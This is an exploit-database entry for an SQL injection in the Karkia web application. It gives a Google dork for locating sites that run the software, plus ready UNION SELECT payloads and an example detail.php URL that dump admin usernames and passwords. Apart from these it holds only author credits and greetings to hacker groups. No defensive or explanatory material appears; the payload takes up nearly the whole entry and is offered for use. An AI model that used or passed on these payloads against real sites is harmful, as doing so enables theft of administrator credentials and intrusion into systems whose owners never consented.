1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #######################[In The Name Of God ]########################## #Exploit Title : Karkia SQL Injection Vulnerability #Author : Net.Edit0r #Contact : Net.Edit0r@Att.Net #Location : Iran #Category : webapps Google dork : Powered by: Karkia.net #Code : [exploit code] ######################################################################## # # [~]Vulnerable File # # ~~~ > id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin-- # # ~~~ > id=-1+union+select+1,concat(user,0x3a,pass),3+from+admin-- # # [~] Example # # http://127.0.0.1/detail.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin # ######################################################################## #Greetz : Netqurd [M1] ~ Hitler #Special Thanks : D3v1.BlackHat, M4hd1, Riden , B3hz4d #Thanks 2 : ~[ CriMe ]~ , _R3v4l_ , † CoNstaNtine † , __l2o5v4__ , # : ~~XTerror~~ , _RAMESH_ #Note : IRANIAN HackerZ ######################################################################## #AttackerZ.IR ( Crazy Boys ) #Sun-army.Org (Iranian HacKerZ) #Dark-tunnel.com (UnderGround Team) #PHC.IR (Phc-Persian Hackerz Community) #DevilzTM.Com (Devilztm Security Team) ###########################[Net.Edit0r]#################################